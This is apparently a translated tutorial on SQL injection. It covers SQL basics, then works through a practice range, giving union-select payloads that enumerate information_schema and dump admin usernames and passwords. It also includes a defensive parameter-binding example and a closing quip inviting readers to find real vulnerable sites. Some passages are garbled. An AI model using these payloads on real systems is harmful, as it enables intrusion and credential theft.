Table of Contents
- Conditional query
- Query order
- Limiting results
- Union query
- Display position
- SQL built-in functions
- Built-in databases and tables
- mycli auxiliary commands
- SQL injection types
- Practice range
- Determine whether there is an injection point, and its type
- Find how many fields there are
- Database query
- Get the table names
- Dump the field names
- Get the password: view the value of the password field
- Summary
Let me start with a joke: the whole world can be injected, but your heart cannot.
(Subtext: you do not belong to the set "the whole world". Suppose you belong to the set of humans; humans belong to the set of the world; you do not belong to the set of the world; therefore you do not belong to the set of humans, so the conclusion is that you are not human!!!)
Let's first take a look at the table in the test environment.
A conditional query is really just a query with a where clause added.
Here is an example.
Suppose we now want to pull out Xiao Ming:
select * from hello where id=1;
select * from hello where name="小明";
select * from hello where name="小明" or id = 1;
select * from hello where id=1 and age=15;
By default, order by in SQL sorts from small to large (ascending).
The default order:
select * from hello;  # equivalent to: select * from hello order by id;
But that is not the point. The point is this:
select * from hello order by 1; select * from hello order by 3;
Look carefully at the following two results and you will find that they match these:
select * from hello order by id; select * from hello order by age;
So what is this actually used for? Of course it is not just for sorting: during injection, order by is how you work out how many fields the query has.
In limit x, y, x is the offset to start from (counting from 0) and y is how many rows to take starting from x.
For example, limit 0, 2 returns the first and second rows;
limit 1, 2 returns the second and third rows;
and so on.
Let me give an example: extract the name and the age using a union query.
select name from hello union select age from hello;
This combines two different result sets into one.
Note two points:
first, the two halves of a union query can come from two different tables;
second, the two halves of a union query must return the same number of fields.
Pay attention to one more thing about the result.
First of all, we have to know the number of fields returned by the first half of the query. What is that for? See the practice example later.
For how this plays out, just look at the example results.
SQL built-in functions
View the database name.
Back to the previous summary.
Built-in databases and tables
These are built in and mainly store information about tables, databases and users. This is very important: basically it is the entry point for penetration via injection, which is to obtain the database users and passwords.
For example, the relationships in this table.
Here is an example:
mycli auxiliary commands
This is a handy tool written in Python; it provides command prompting and completion, making your operations more convenient.
SQL injection types
There are two types: integer injection and character injection.
The difference between the two, or rather why they are split this way, comes down to the query statement.
In a URL a very typical pattern is "?id=content"; the id=1 that follows is combined with the back-end data access to generate a query statement, for example:
https://hello.com?id=5
Suppose this is the URL for switching pages. The corresponding SQL query might be
select html_view from html_views where id = 5   (this is the integer form)
or
select html_view from html_views where id = '5'   (this is the character form)
Now let's try it.
Obviously, this site treats the parameter as a character. By rights, if it were an integer then 1+1 would be 2 and it would return this page.
Try it now: get all the data by injecting. This is the low security level, so there is no filtering and the injection goes straight through.
This is equivalent to forming the statement
select * from table where id='' or 1=1#';
That is just the equivalent. Also, this is not blind injection; it gives obvious hints, so it is a fairly basic range, just for fun. This example mainly introduces the injection types.
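As an added example (not code from the original post), here is the integer-versus-character distinction in code: a query built by pasting the URL parameter into the SQL, which turns the post's `' or 1=1#` input into exactly the statement shown above, beside a hardened version that checks the id is an integer and binds it as a parameter. The hello table, its rows and the function names are constructed for the example, and sqlite3 stands in for MySQL.

```python
import sqlite3

# Constructed stand-in for the post's "hello" table (sqlite3 replaces MySQL here).
ROWS = [(1, "xiaoming", 15), (2, "xiaohong", 16), (3, "lihua", 17)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table hello (id integer, name text, age integer)")
    conn.executemany("insert into hello values (?, ?, ?)", ROWS)
    return conn


def build_vulnerable_sql(user_id):
    """The 'character' pattern from the post: the raw URL parameter is pasted
    between quotes, so a quote in the input ends the string early and the
    rest is read as SQL. Returned as text only; never executed here."""
    return f"select * from hello where id='{user_id}';"


def query_hardened(conn, user_id):
    """Hardened form for an integer injection point: reject anything that is
    not a plain non-negative integer, then bind the value as a parameter so
    the driver never lets it become part of the SQL text."""
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    cur = conn.execute("select * from hello where id = ?", (int(user_id),))
    return cur.fetchall()


def query_bound_raw(conn, user_id):
    """Parameter binding alone (no type check): the whole input is compared
    as one literal value, so no row matches and the SQL is not altered."""
    cur = conn.execute("select * from hello where id = ?", (user_id,))
    return cur.fetchall()


def rejects(conn, user_id):
    """True when the hardened path refuses the input."""
    try:
        query_hardened(conn, user_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql("' or 1=1#"))  # the statement from the post
    print(query_hardened(db, "1"))
    print(query_bound_raw(db, "' or 1=1#"))
    print(rejects(db, "1+1"))
```

The `1+1` case is the post's own integer test: the hardened path rejects it up front instead of letting the database evaluate it.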
Practice range
If it weren't for this, if it weren't for what it is, whoever went to the practice range would be close enough.
This is a classic example.
We got its administrator password.
Determine whether there is an injection point, and its type
In fact, id is directly the injection point, but it depends on what type it is.
If it is character injection, you have to add a # sign, right?
Find how many fields there are
This is guessed by luck.
3 doesn't work.
How to play it? Look at this.
So, got it, on to the database.
Get the table names
This is really just a look; let me make it clearer here.
Do you remember the earlier statement?
union select table_name from information_schema.tables where table_schema='huterox';
First, a word about the group_concat() function.
It lists all the values under the current field in a single result.
union select table_name from information_schema.tables where table_schema='maoshe';
We query the current table, that is, the field names of the table that stores maoshe, and we also need the values inside it, so that we know which tables are in there.
So add group_concat():
union select group_concat(table_name) from information_schema.tables where table_schema='maoshe'
Dump the field names
A blind guess: the admin table, which contains what I want.
Let's take a look at what is in the admin table.
union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
Get the password: view the value of the password field
union select 1,group_concat(username,":",password) from maoshe.admin
Summary
1. Determine how many fields there are.
2. Once the field count is known, use a union query to do the work.
3. Know some of SQL's built-in databases, such as where the tables are stored.
4. Good luck finding a vulnerable website, other than a practice range.
The key points are:
know what the database is;
guess which table is the user table;
guess what fields the user table has;
extract the field values.